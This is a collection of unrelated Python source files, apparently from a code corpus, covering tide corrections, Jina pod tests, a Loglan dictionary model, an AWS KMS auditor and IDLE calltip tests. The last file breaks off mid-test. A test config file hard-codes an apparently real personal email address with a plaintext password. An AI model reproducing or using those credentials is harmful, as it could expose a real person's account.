    def forward(self, input_ids, token_type_ids=None, attention_mask=None, embed_only=False):
        """Return logits, or (embeddings, mask) when embed_only is True."""
        if attention_mask is None:
            attention_mask = torch.ones_like(input_ids)
        if token_type_ids is None:
            token_type_ids = torch.zeros_like(input_ids)
        # Additive attention mask: 0 where attended, -10000 where masked.
        mask = attention_mask.unsqueeze(1).unsqueeze(2)
        mask = mask.to(dtype=next(self.parameters()).dtype)  # fp16 compatibility
        mask = (1.0 - mask) * -10000.0
        embeddings = self.embeddings(input_ids, token_type_ids)
        if embed_only:
            return embeddings, mask
        return self.model_from_embeddings(embeddings, mask)
|
from django.apps import AppConfig
class ToolConfig(AppConfig):
    """Django application configuration for the ``tool`` app."""
    name = 'tool'
|
from setuptools import setup
# Packaging metadata for the html-compiler distribution; exposes the
# ``html_compiler`` console script pointing at html_compiler.__main__:main.
setup(
    name='html-compiler',
    version='0.1',
    author='Hsuan-Hau Liu',
    description='A simple and lightweight html compiler.',
    packages=['html_compiler', ],
    install_requires=['beautifulsoup4'],
    entry_points={
        'console_scripts': [
            'html_compiler=html_compiler.__main__:main'
        ]
    }
)
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
import time
import threading
import queue
import tidegravity as tide
def point_correction(lat, lon, alt=0, date=None):
    """Solve tidal correction for a static point and time.

    Args:
        lat, lon: position in decimal degrees.
        alt: altitude (default 0).
        date: datetime of the correction; defaults to the current UTC time.

    Returns:
        dict with 'gm', 'gs', 'g0' correction components and 'ts', the
        epoch timestamp of *date*.
    """
    # BUG FIX: the old signature used ``date=datetime.utcnow()``, which is
    # evaluated once at import time, so every defaulted call reused that
    # same stale instant.
    if date is None:
        date = datetime.utcnow()
    # NOTE(review): utcnow() is naive, and naive .timestamp() assumes local
    # time, so 'ts' is skewed unless the host clock is UTC. Consider
    # datetime.now(timezone.utc) if the tide solver accepts aware datetimes.
    gm, gs, g0 = tide.solve_longman_tide_scalar(lat, lon, alt, date)
    message = {'gm': gm, 'gs': gs, 'g0': g0, 'ts': date.timestamp()}
    return message
def series_correction(lat, lon, alt=0, date=None, fields=None):
    """Solve a tide-correction series starting at *date*.

    Args:
        lat, lon: position in decimal degrees.
        alt: altitude (default 0).
        date: series start; defaults to the current UTC time.
        fields: correction columns to include (default ['g0']).

    Returns:
        list of dicts, one per sample, each with the requested fields plus
        'ts', the sample's epoch timestamp.
    """
    # BUG FIX: the old ``date=datetime.now(tz=timezone.utc)`` default was
    # evaluated once at import time, freezing the series start for every
    # defaulted call.
    if date is None:
        date = datetime.now(tz=timezone.utc)
    # n=3600 samples at 'T' (1-minute) increments.
    df = tide.solve_point_corr(lat, lon, alt, date, n=3600, increment='T')
    if fields is None:
        fields = ['g0']
    result = []
    for _, line in df.iterrows():
        data = {k: line[k] for k in fields}
        data['ts'] = line.name.timestamp()
        result.append(data)
    return result
def _tide_generator(lat, lon, alt):
    # Coroutine-style generator: after priming, send a timestamp to receive
    # the tide-correction dict for it.
    # NOTE(review): each cycle has TWO yields — send(ts) returns the dict,
    # but the following send/next returns None while advancing back to the
    # input yield. Confirm consumers alternate send()/next() as intended.
    while True:
        ts = yield
        yield point_correction(lat, lon, alt, ts)
def get_tide_generator(lat, lon, alt):
    """Return a primed tide-correction generator (see _tide_generator)."""
    gen = _tide_generator(lat, lon, alt)
    gen.send(None)  # prime: advance to the first ``ts = yield``
    return gen
class ThreadedTideGenerator(threading.Thread):
    """Background thread that periodically publishes tide corrections.

    Every 60 seconds a correction for (lat, lon, alt) at the current UTC
    time is put on the publish queue as a dict with 'gm', 'gs', 'g0' and
    'ts' (an aware datetime).
    """

    def __init__(self, lat, lon, alt, start_ts=None, publish_queue=None):
        super().__init__()
        self._exiting = threading.Event()
        self._sleep = 60  # seconds between corrections
        self._queue = publish_queue or queue.Queue()
        self.lat = lat
        self.lon = lon
        self.alt = alt
        # Optional epoch time to delay the first correction until.
        self._start_time = start_ts or time.time()

    @property
    def queue(self):
        """The queue corrections are published to."""
        return self._queue

    def stop(self):
        """Signal the run loop to exit after the current sleep interval.

        ROBUSTNESS: previously ``_exiting`` was never set anywhere, so the
        thread could not be stopped gracefully.
        """
        self._exiting.set()

    def run(self):
        delta_ts = self._start_time - time.time()
        if delta_ts > 0:
            time.sleep(delta_ts)
        while not self._exiting.is_set():
            ts = datetime.now(tz=timezone.utc)
            # BUG FIX: point_correction returns a dict, not a 3-tuple; the
            # old ``gm, gs, g0 = point_correction(...)`` raised ValueError.
            corr = point_correction(self.lat, self.lon, self.alt, date=ts)
            message = {'gm': corr['gm'], 'gs': corr['gs'], 'g0': corr['g0'], 'ts': ts}
            self._queue.put_nowait(message)
            time.sleep(self._sleep)
|
import unittest
from jina.main.parser import set_pea_parser, set_pod_parser, set_gateway_parser
from jina.peapods.gateway import GatewayPea
from jina.peapods.pea import BasePea
from jina.peapods.pod import BasePod, GatewayPod, MutablePod, GatewayFlowPod, FlowPod
from tests import JinaTestCase
class PeaPodsTestCase(JinaTestCase):
    """Lifecycle smoke tests for Pea/Pod variants.

    Each scenario is exercised with both the 'process' and 'thread'
    runtimes, both as a context manager and via start()/close().
    """

    def test_pea_context(self):
        def _test_pea_context(runtime):
            args = set_pea_parser().parse_args(['--runtime', runtime])
            with BasePea(args):
                pass
            BasePea(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_pea_context(j)

    def test_address_in_use(self):
        # Two peas sharing the same control port must still start and
        # shut down cleanly.
        args1 = set_pea_parser().parse_args(['--port-ctrl', '55555'])
        args2 = set_pea_parser().parse_args(['--port-ctrl', '55555'])
        with BasePea(args1), BasePea(args2):
            pass
        args1 = set_pea_parser().parse_args(['--port-ctrl', '55555', '--runtime', 'thread'])
        args2 = set_pea_parser().parse_args(['--port-ctrl', '55555', '--runtime', 'thread'])
        with BasePea(args1), BasePea(args2):
            pass
        print('everything should quit gracefully')

    def test_pod_context(self):
        def _test_pod_context(runtime):
            args = set_pod_parser().parse_args(['--runtime', runtime, '--parallel', '2'])
            with BasePod(args):
                pass
            BasePod(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_pod_context(j)

    def test_gateway_pea(self):
        def _test_gateway_pea(runtime):
            args = set_gateway_parser().parse_args(['--runtime', runtime])
            with GatewayPea(args):
                pass
            GatewayPea(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_gateway_pea(j)

    def test_gateway_pod(self):
        def _test_gateway_pod(runtime):
            args = set_gateway_parser().parse_args(['--runtime', runtime])
            with GatewayPod(args):
                pass
            GatewayPod(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_gateway_pod(j)

    def test_gatewayflow_pod(self):
        def _test_gateway_pod(runtime):
            # GatewayFlowPod takes a plain kwargs dict instead of parsed args.
            with GatewayFlowPod({'runtime': runtime}):
                pass
            GatewayFlowPod({'runtime': runtime}).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_gateway_pod(j)

    def test_mutable_pod(self):
        def _test_mutable_pod(runtime):
            # MutablePod is constructed from another pod's peas_args.
            args = set_pod_parser().parse_args(['--runtime', runtime, '--parallel', '2'])
            with MutablePod(BasePod(args).peas_args):
                pass
            MutablePod(BasePod(args).peas_args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_mutable_pod(j)

    def test_flow_pod(self):
        def _test_flow_pod(runtime):
            args = {'runtime': runtime, 'parallel': 2}
            with FlowPod(args):
                pass
            FlowPod(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_flow_pod(j)

    def test_pod_context_autoshutdown(self):
        def _test_pod_context(runtime):
            # --shutdown-idle: join() returns once the peas exceed max-idle-time.
            args = set_pod_parser().parse_args(['--runtime', runtime,
                                                '--parallel', '2',
                                                '--max-idle-time', '5',
                                                '--shutdown-idle'])
            with BasePod(args) as bp:
                bp.join()
            BasePod(args).start().close()

        for j in ('process', 'thread'):
            with self.subTest(runtime=j):
                _test_pod_context(j)

    def test_peas_naming_with_parallel(self):
        args = set_pod_parser().parse_args(['--name', 'pod',
                                            '--parallel', '2',
                                            '--max-idle-time', '5',
                                            '--shutdown-idle'])
        with BasePod(args) as bp:
            # Head/tail routers are created first, then the parallel peas.
            self.assertEqual(bp.peas[0].name, 'pod-head')
            self.assertEqual(bp.peas[1].name, 'pod-tail')
            self.assertEqual(bp.peas[2].name, 'pod-1')
            self.assertEqual(bp.peas[3].name, 'pod-2')
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
# pylint: disable=missing-module-docstring,missing-class-docstring,missing-function-docstring,line-too-long
from eze.core.reporter import ReporterMeta
from tests.__fixtures__.fixture_helper import get_snapshot_directory
class ReporterMetaTestBase:
    """Shared pytest base for ReporterMeta plugins.

    Subclasses point ReporterMetaClass/SNAPSHOT_PREFIX at a concrete
    reporter and inherit the snapshot and license checks.
    """
    ReporterMetaClass = ReporterMeta
    SNAPSHOT_PREFIX = "reporter-meta"

    def test_help_text_fields(self, snapshot):
        """All help-text class methods render into a stable snapshot."""
        # When
        short_description_output = self.ReporterMetaClass.short_description()
        config_output = self.ReporterMetaClass.config_help()
        install_output = self.ReporterMetaClass.install_help()
        license_output = self.ReporterMetaClass.license()
        more_info_output = self.ReporterMetaClass.more_info()
        # Then
        output = f"""short_description:
======================
{short_description_output}
config_help:
======================
{config_output}
install_help:
======================
{install_output}
license:
======================
{license_output}
more_info:
======================
{more_info_output}
"""
        # WARNING: this is a snapshot test, any changes to format will edit this and the snapshot will need to be updated
        snapshot.snapshot_dir = get_snapshot_directory()
        snapshot.assert_match(output, f"plugins_reporters/{self.SNAPSHOT_PREFIX}-help_text.txt")

    def test_license__not_unknown(self):
        """A reporter must declare a concrete license, not "Unknown"."""
        # Given
        unexpected_license = "Unknown"
        # When
        output = self.ReporterMetaClass.license()
        # Then
        assert output != unexpected_license

    def test_install_help(self, snapshot):
        # When
        output = self.ReporterMetaClass.install_help()
        # Then
        # WARNING: this is a snapshot test, any changes to format will edit this and the snapshot will need to be updated
        snapshot.snapshot_dir = get_snapshot_directory()
        snapshot.assert_match(output, f"plugins_reporters/{self.SNAPSHOT_PREFIX}-install-help.txt")
|
import os

# Absolute path of the directory containing this config file.
basedir = os.path.abspath(os.path.dirname(__file__))

# Test configuration: local PostgreSQL test database, CORS on, no mirroring.
SQLALCHEMY_DATABASE_URI = "postgresql://ed_user:ed_pass@localhost/stardrive_test"
TESTING = True
CORS_ENABLED = True
DEBUG = False
DEVELOPMENT = False
MASTER_URL = "http://localhost:5000"
# NOTE(review): plaintext credentials committed to source — acceptable only
# for throwaway test fixtures; rotate them if they are real.
MASTER_EMAIL = "daniel.h.funk@gmail.com"
MASTER_PASS = "dfunk7"
MIRRORING = False
DELETE_RECORDS = False

# Local Elasticsearch instance used by the test suite.
ELASTIC_SEARCH = {
    "index_prefix": "stardrive_test",
    "hosts": ["localhost"],
    "port": 9200,
    "timeout": 20,
    "verify_certs": False,
    "use_ssl": False,
    "http_auth_user": "",
    "http_auth_pass": ""
}

#: Default attribute map for single signon.
# This makes it a little easier to spoof the values that come back from
# Shibboleth. One of the aspects of constructing custom headers is that
# they are automatically converted to META Keys, so we have to refer
# to them as that when pulling them out. This is slightly different from
# the structure that actually comes back from Shibboleth.
SSO_ATTRIBUTE_MAP = {
    'HTTP_EPPN': (True, 'eppn'),  # dhf8r@virginia.edu
    'HTTP_UID': (False, 'uid'),  # dhf8r
    'HTTP_GIVENNAME': (False, 'givenName'),  # Daniel
    'HTTP_MAIL': (False, 'email')  # dhf8r@Virginia.EDU
}

GOOGLE_MAPS_API_KEY = "TEST_API_KEY_GOES_HERE"
"""
Copyright 2020 Skyscanner Ltd
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
from lambdaguard.core.AWS import AWS
from lambdaguard.utils.log import debug
class KMS(AWS):
    """Collects key policies and rotation status for a KMS key ARN.

    Failures from the AWS API are logged via debug() and otherwise ignored
    (best-effort auditing).
    """

    def __init__(self, arn, profile=None, access_key_id=None, secret_access_key=None):
        super().__init__(arn, profile, access_key_id, secret_access_key)
        self.policies = {}
        self.rotation = False
        # Console deep-link to this key for reports.
        self.info = "https://{0}.console.aws.amazon.com/kms/home?region={0}#/kms/keys/{1}/".format(
            self.arn.region, self.arn.resource
        )
        self.get_policies()

    def get_policies(self):
        """Fetches list of applicable key policy names"""
        try:
            paginator = self.client.get_paginator("list_key_policies")
            for page in paginator.paginate(KeyId=self.arn.resource):
                for name in page["PolicyNames"]:
                    self.get_policy(name)
        except Exception:
            debug(self.arn.full)

    def get_policy(self, policy_name):
        """Fetches key policy by name"""
        try:
            raw = self.client.get_key_policy(KeyId=self.arn.resource, PolicyName=policy_name)
            self.policies[policy_name] = json.loads(raw["Policy"])
        except Exception:
            debug(self.arn.full)

    def get_rotation_status(self):
        """Fetches automatic key rotation status"""
        try:
            status = self.client.get_key_rotation_status(KeyId=self.arn.resource)
            self.rotation = status["KeyRotationEnabled"]
        except Exception:
            debug(self.arn.full)
|
# -*- coding: utf-8 -*-
# pylint: disable=C0103
"""
This module contains a basic Word Model
"""
from __future__ import annotations
from flask_sqlalchemy import BaseQuery
from loglan_db import db
from loglan_db.model_db import t_name_words, \
t_name_types, t_name_events
from loglan_db.model_db.base_author import BaseAuthor
from loglan_db.model_db.base_connect_tables import \
t_connect_authors, t_connect_words, t_connect_keys
from loglan_db.model_db.base_definition import BaseDefinition
from loglan_db.model_db.base_event import BaseEvent
from loglan_db.model_db.base_key import BaseKey
from loglan_db.model_db.base_type import BaseType
from loglan_db.model_init import InitBase, DBBase
__pdoc__ = {
'BaseWord.created': False, 'BaseWord.updated': False,
}
class BaseWord(db.Model, InitBase, DBBase):
    """BaseWord model"""
    __tablename__ = t_name_words

    id = db.Column(db.Integer, primary_key=True)
    """Word's internal ID number: Integer"""

    name = db.Column(db.String(64), nullable=False)
    origin = db.Column(db.String(128))
    origin_x = db.Column(db.String(64))
    match = db.Column(db.String(8))
    rank = db.Column(db.String(8))
    year = db.Column(db.Date)
    notes = db.Column(db.JSON)

    # Fields for legacy database compatibility
    id_old = db.Column(db.Integer, nullable=False)
    TID_old = db.Column(db.Integer)  # references

    # Relationships
    type_id = db.Column("type", db.ForeignKey(f'{t_name_types}.id'), nullable=False)
    _type: BaseType = db.relationship(
        BaseType.__name__, back_populates="_words")

    # Event in which the word first appeared.
    event_start_id = db.Column(
        "event_start", db.ForeignKey(f'{t_name_events}.id'), nullable=False)
    _event_start: BaseEvent = db.relationship(
        BaseEvent.__name__, foreign_keys=[event_start_id],
        back_populates="_appeared_words")

    # Event in which the word was deprecated (nullable: still current).
    event_end_id = db.Column("event_end", db.ForeignKey(f'{t_name_events}.id'))
    _event_end: BaseEvent = db.relationship(
        BaseEvent.__name__, foreign_keys=[event_end_id],
        back_populates="_deprecated_words")

    _authors: BaseQuery = db.relationship(
        BaseAuthor.__name__, secondary=t_connect_authors,
        back_populates="_contribution", lazy='dynamic', enable_typechecks=False)

    _definitions: BaseQuery = db.relationship(
        BaseDefinition.__name__, back_populates="_source_word", lazy='dynamic')

    # word's derivatives
    # Self-referential many-to-many via t_connect_words: parent_id/child_id
    # rows link a word to its derivatives; the backref exposes '_parents'.
    _derivatives = db.relationship(
        'BaseWord', secondary=t_connect_words,
        primaryjoin=(t_connect_words.c.parent_id == id),
        secondaryjoin=(t_connect_words.c.child_id == id),
        backref=db.backref('_parents', lazy='dynamic', enable_typechecks=False),
        lazy='dynamic', enable_typechecks=False)

    # NOTE(review): these properties are annotated as BaseQuery, but _type,
    # _event_start and _event_end are scalar relationships — confirm the
    # intended annotations.
    @property
    def type(self) -> BaseQuery:
        return self._type

    @property
    def event_start(self) -> BaseQuery:
        return self._event_start

    @property
    def event_end(self) -> BaseQuery:
        return self._event_end

    @property
    def authors(self) -> BaseQuery:
        return self._authors

    @property
    def definitions(self) -> BaseQuery:
        return self._definitions

    @property
    def derivatives(self) -> BaseQuery:
        return self._derivatives

    def query_derivatives(
            self, word_type: str = None, word_type_x: str = None,
            word_group: str = None) -> BaseQuery:
        """Query to get all derivatives of the word, depending on its parameters

        Args:
            word_type: str: (Default value = None)
                E.g. "2-Cpx", "C-Prim", "LW"<hr>
            word_type_x: str: (Default value = None)
                E.g. "Predicate", "Name", "Affix"<hr>
            word_group: str: (Default value = None)
                E.g. "Cpx", "Prim", "Little"<hr>

        Returns:
            BaseQuery
        """
        type_values = [
            (BaseType.type, word_type),
            (BaseType.type_x, word_type_x),
            (BaseType.group, word_group), ]
        # Only build filters for the arguments actually supplied.
        type_filters = [i[0] == i[1] for i in type_values if i[1]]

        return self._derivatives.join(BaseType)\
            .filter(self.id == t_connect_words.c.parent_id, *type_filters)\
            .order_by(type(self).name.asc())

    @property
    def parents(self) -> BaseQuery:
        """Query to get all parents for Complexes, Little words or Affixes

        Returns:
            BaseQuery
        """
        return self._parents

    @property
    def complexes(self) -> BaseQuery:
        """
        Get all word's complexes if exist
        Only primitives and Little Words have complexes.

        Returns:
            BaseQuery
        """
        return self.query_derivatives(word_group="Cpx")

    @property
    def affixes(self) -> BaseQuery:
        """
        Get all word's affixes if exist
        Only primitives have affixes.

        Returns:
            BaseQuery
        """
        return self.query_derivatives(word_type="Afx")

    @property
    def keys(self) -> BaseQuery:
        """Get all BaseKey object related to this BaseWord.
        Keep in mind that duplicated keys from related definitions
        will be counted with ```.count()``` but excluded from ```.all()``` request

        Returns:
            BaseQuery
        """
        return BaseKey.query.join(
            t_connect_keys, BaseDefinition, BaseWord).filter(BaseWord.id == self.id)
|
class IncorrectParametersException(Exception):
    """Raised for invalid or ill-formed parameters.

    NOTE(review): semantics inferred from the name — confirm at raise sites.
    """
    pass
class APIErrorException(Exception):
    """Raised when an API call fails.

    NOTE(review): semantics inferred from the name — confirm at raise sites.
    """
    pass
|
from __future__ import print_function, division
import numpy as np
from .fitmodel import FitModel
class Gaussian(FitModel):
    """Gaussian fitting model.

    Parameters are xoffset, yoffset, sigma, and amp.
    """
    def __init__(self):
        # Fit self.gaussian with 'x' as the sole independent variable.
        FitModel.__init__(self, self.gaussian, independent_vars=['x'])

    @staticmethod
    def gaussian(x, xoffset, yoffset, sigma, amp):
        """Evaluate amp * exp(-(x-xoffset)^2 / (2*sigma^2)) + yoffset."""
        return amp * np.exp(-((x-xoffset)**2) / (2 * sigma**2)) + yoffset
|
from setuptools import setup, find_packages
# Packaging metadata for the django-response-mid middleware distribution.
setup(name='django-response-mid',
      version='2.1',
      description='django response middleware',
      classifiers=[
          'Programming Language :: Python',
          'Intended Audience :: Developers',
          'Operating System :: OS Independent',
      ],
      url='https://github.com/txf402066270/django-midd/',
      author='wu-di-tian-ge-ge',
      author_email='402066270@qq.com',
      license='NEU',
      packages=find_packages(),
      zip_safe=True,
      install_requires=['django', 'djangorestframework']
      )
|
import pandas as pd
from neatrader.utils import small_date, from_small_date
from ta.utils import dropna
from ta.trend import MACD
from ta.volatility import BollingerBands
from ta.momentum import RSIIndicator
class TrainingSetGenerator:
    """Builds a training set of technical indicators from close-price data.

    Reads ``close.csv`` from source_path and appends MACD, Bollinger-band
    and RSI columns; to_csv() splits the result chronologically into
    training and cross-validation files.
    """

    def __init__(self, source_path):
        self.source_path = source_path

    def generate(self):
        """Return the close-price frame enriched with indicator columns."""
        frame = pd.read_csv(self.source_path / 'close.csv',
                            parse_dates=['date'], date_parser=from_small_date)
        frame = dropna(frame)
        closes = frame['close']
        for add_indicator in (self._macd, self._bollinger_bands, self._rsi):
            add_indicator(frame, closes)
        return frame

    def to_csv(self, out_path=None, cv_proportion=0.2):
        """Write training.csv / cross_validation.csv; return the directory used."""
        target = out_path if out_path else self.source_path
        frame = self.generate()
        frame['date'] = frame['date'].apply(small_date)
        cutoff = int(len(frame) * (1 - cv_proportion))
        frame[:cutoff].to_csv(target / 'training.csv', encoding='utf-8', index=False)
        # cross validation always uses the most recent data
        frame[cutoff:].to_csv(target / 'cross_validation.csv', encoding='utf-8', index=False)
        return target

    def _macd(self, frame, closes):
        # Moving-average convergence/divergence columns.
        indicator = MACD(close=closes)
        frame['macd'] = indicator.macd()
        frame['macd_signal'] = indicator.macd_signal()
        frame['macd_diff'] = indicator.macd_diff()

    def _bollinger_bands(self, frame, closes):
        # Bollinger middle/upper/lower bands.
        indicator = BollingerBands(close=closes)
        frame['bb_bbm'] = indicator.bollinger_mavg()
        frame['bb_bbh'] = indicator.bollinger_hband()
        frame['bb_bbl'] = indicator.bollinger_lband()

    def _rsi(self, frame, closes):
        # Relative strength index.
        indicator = RSIIndicator(close=closes)
        frame['rsi'] = indicator.rsi()
|
"Test calltip, coverage 60%"
from idlelib import calltip
import unittest
import textwrap
import types
import re
# Test Class TC is used in multiple get_argspec test methods
class TC():
    'doc'
    # Expected calltip for calling the class itself (__init__ minus self).
    tip = "(ai=None, *b)"

    def __init__(self, ai=None, *b): 'doc'
    # Each method stores its expected calltip on the function object as .tip.
    __init__.tip = "(self, ai=None, *b)"

    def t1(self): 'doc'
    t1.tip = "(self)"

    def t2(self, ai, b=None): 'doc'
    t2.tip = "(self, ai, b=None)"

    def t3(self, ai, *args): 'doc'
    t3.tip = "(self, ai, *args)"

    def t4(self, *args): 'doc'
    t4.tip = "(self, *args)"

    def t5(self, ai, b=None, *args, **kw): 'doc'
    t5.tip = "(self, ai, b=None, *args, **kw)"

    def t6(no, self): 'doc'
    t6.tip = "(no, self)"

    def __call__(self, ci): 'doc'
    __call__.tip = "(self, ci)"

    def nd(self): pass  # No doc.

    # attaching .tip to wrapped methods does not work
    @classmethod
    def cm(cls, a): 'doc'

    @staticmethod
    def sm(b): 'doc'
tc = TC()  # shared fixture instance used by the bound-method/__call__ tests
default_tip = calltip._default_callable_argspec  # fallback tip for opaque callables
get_spec = calltip.get_argspec  # shorthand used throughout the tests
class Get_argspecTest(unittest.TestCase):
    # The get_spec function must return a string, even if blank.
    # Test a variety of objects to be sure that none cause it to raise
    # (quite aside from getting as correct an answer as possible).
    # The tests of builtins may break if inspect or the docstrings change,
    # but a red buildbot is better than a user crash (as has happened).
    # For a simple mismatch, change the expected output to the actual.

    def test_builtins(self):
        # Spot-check argspecs produced for builtin callables and methods.
        def tiptest(obj, out):
            self.assertEqual(get_spec(obj), out)
        # Python class that inherits builtin methods
        class List(list): "List() doc"
        # Simulate builtin with no docstring for default tip test
        class SB: __call__ = None

        if List.__doc__ is not None:
            tiptest(List,
                    f'(iterable=(), /){calltip._argument_positional}'
                    f'\n{List.__doc__}')
        tiptest(list.__new__,
                '(*args, **kwargs)\n'
                'Create and return a new object. '
                'See help(type) for accurate signature.')
        tiptest(list.__init__,
                '(self, /, *args, **kwargs)'
                + calltip._argument_positional + '\n' +
                'Initialize self. See help(type(self)) for accurate signature.')
        append_doc = (calltip._argument_positional
                      + "\nAppend object to the end of the list.")
        tiptest(list.append, '(self, object, /)' + append_doc)
        tiptest(List.append, '(self, object, /)' + append_doc)
        tiptest([].append, '(object, /)' + append_doc)
        tiptest(types.MethodType, "method(function, instance)")
        tiptest(SB(), default_tip)
        p = re.compile('')
        tiptest(re.sub, '''\
(pattern, repl, string, count=0, flags=0)
Return the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in string by the
replacement repl. repl can be either a string or a callable;
if a string, backslash escapes in it are processed. If it is
a callable, it's passed the Match object and must return''')
        tiptest(p.sub, '''\
(repl, string, count=0)
Return the string obtained by replacing the leftmost \
non-overlapping occurrences o...''')

    def test_signature_wrap(self):
        # A long signature is wrapped onto continuation lines.
        if textwrap.TextWrapper.__doc__ is not None:
            self.assertEqual(get_spec(textwrap.TextWrapper), '''\
(width=70, initial_indent='', subsequent_indent='', expand_tabs=True,
replace_whitespace=True, fix_sentence_endings=False, break_long_words=True,
drop_whitespace=True, break_on_hyphens=True, tabsize=8, *, max_lines=None,
placeholder=' [...]')''')

    def test_properly_formated(self):
        # Continuation lines of wrapped signatures are prefixed with
        # calltip._INDENT.
        def foo(s='a'*100):
            pass

        def bar(s='a'*100):
            """Hello Guido"""
            pass

        def baz(s='a'*100, z='b'*100):
            pass

        indent = calltip._INDENT

        sfoo = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
               "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
               "aaaaaaaaaa')"
        sbar = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
               "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
               "aaaaaaaaaa')\nHello Guido"
        sbaz = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
               "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
               "aaaaaaaaaa', z='bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"\
               "bbbbbbbbbbbbbbbbb\n" + indent + "bbbbbbbbbbbbbbbbbbbbbb"\
               "bbbbbbbbbbbbbbbbbbbbbb')"

        for func,doc in [(foo, sfoo), (bar, sbar), (baz, sbaz)]:
            with self.subTest(func=func, doc=doc):
                self.assertEqual(get_spec(func), doc)

    def test_docline_truncation(self):
        # An over-long single doc line is truncated with an ellipsis.
        def f(): pass
        f.__doc__ = 'a'*300
        self.assertEqual(get_spec(f), f"()\n{'a'*(calltip._MAX_COLS-3) + '...'}")

    def test_multiline_docstring(self):
        # Test fewer lines than max.
        self.assertEqual(get_spec(range),
                "range(stop) -> range object\n"
                "range(start, stop[, step]) -> range object")

        # Test max lines
        self.assertEqual(get_spec(bytes), '''\
bytes(iterable_of_ints) -> bytes
bytes(string, encoding[, errors]) -> bytes
bytes(bytes_or_buffer) -> immutable copy of bytes_or_buffer
bytes(int) -> bytes object of size given by the parameter initialized with null bytes
bytes() -> empty bytes object''')

        # Test more than max lines
        def f(): pass
        f.__doc__ = 'a\n' * 15
        self.assertEqual(get_spec(f), '()' + '\na' * calltip._MAX_LINES)

    def test_functions(self):
        # Plain functions: tip is the signature plus the one-line doc.
        def t1(): 'doc'
        t1.tip = "()"
        def t2(a, b=None): 'doc'
        t2.tip = "(a, b=None)"
        def t3(a, *args): 'doc'
        t3.tip = "(a, *args)"
        def t4(*args): 'doc'
        t4.tip = "(*args)"
        def t5(a, b=None, *args, **kw): 'doc'
        t5.tip = "(a, b=None, *args, **kw)"

        doc = '\ndoc' if t1.__doc__ is not None else ''
        for func in (t1, t2, t3, t4, t5, TC):
            with self.subTest(func=func):
                self.assertEqual(get_spec(func), func.tip + doc)

    def test_methods(self):
        # Unbound methods keep 'self' in the tip.
        doc = '\ndoc' if TC.__doc__ is not None else ''
        for meth in (TC.t1, TC.t2, TC.t3, TC.t4, TC.t5, TC.t6, TC.__call__):
            with self.subTest(meth=meth):
                self.assertEqual(get_spec(meth), meth.tip + doc)
        self.assertEqual(get_spec(TC.cm), "(a)" + doc)
        self.assertEqual(get_spec(TC.sm), "(b)" + doc)

    def test_bound_methods(self):
        # test that first parameter is correctly removed from argspec
        doc = '\ndoc' if TC.__doc__ is not None else ''
        for meth, mtip in ((tc.t1, "()"), (tc.t4, "(*args)"),
                           (tc.t6, "(self)"), (tc.__call__, '(ci)'),
                           (tc, '(ci)'), (TC.cm, "(a)"),):
            with self.subTest(meth=meth, mtip=mtip):
                self.assertEqual(get_spec(meth), mtip + doc)

    def test_starred_parameter(self):
        # test that starred first parameter is *not* removed from argspec
        class C:
            def m1(*args): pass
        c = C()
        for meth, mtip in ((C.m1, '(*args)'), (c.m1, "(*args)"),):
            with self.subTest(meth=meth, mtip=mtip):
                self.assertEqual(get_spec(meth), mtip)

    def test_invalid_method_get_spec(self):
        # Methods that cannot be bound/called yield the _invalid_method tip.
        class C:
            def m2(**kwargs): pass
        class Test:
            def __call__(*, a): pass

        mtip = calltip._invalid_method
        self.assertEqual(get_spec(C().m2), mtip)
        self.assertEqual(get_spec(Test()), mtip)

    def test_non_ascii_name(self):
        # test that re works to delete a first parameter name that
        # includes non-ascii chars, such as various forms of A.
        uni = "(A\u0391\u0410\u05d0\u0627\u0905\u1e00\u3042, a)"
        assert calltip._first_param.sub('', uni) == '(a)'

    def test_no_docstring(self):
        # With no docstring, the tip is just the (adjusted) signature.
        for meth, mtip in ((TC.nd, "(self)"), (tc.nd, "()")):
            with self.subTest(meth=meth, mtip=mtip):
                self.assertEqual(get_spec(meth), mtip)

    def test_attribute_exception(self):
        # get_spec must survive objects whose attribute access raises.
        class NoCall:
            def __getattr__(self, name):
                raise BaseException
        class CallA(NoCall):
            def __call__(oui, a, b, c):
                pass
        class CallB(NoCall):
            def __call__(self, ci):
                pass

        for meth, mtip in ((NoCall, default_tip), (CallA, default_tip),
                           (NoCall(), ''), (CallA(), '(a, b, c)'),
                           (CallB(), '(ci)')):
            with self.subTest(meth=meth, mtip=mtip):
                self.assertEqual(get_spec(meth), mtip)

    def test_non_callables(self):
        # Non-callables produce an empty string rather than raising.
        for obj in (0, 0.0, '0', b'0', [], {}):
            with self.subTest(obj=obj):
                self.assertEqual(get_spec(obj), '')
class Get_entityTest(unittest.TestCase):
    """Tests for calltip.get_entity name resolution."""

    def test_bad_entity(self):
        # An expression that raises during evaluation yields None.
        result = calltip.get_entity('1/0')
        self.assertIs(result, None)

    def test_good_entity(self):
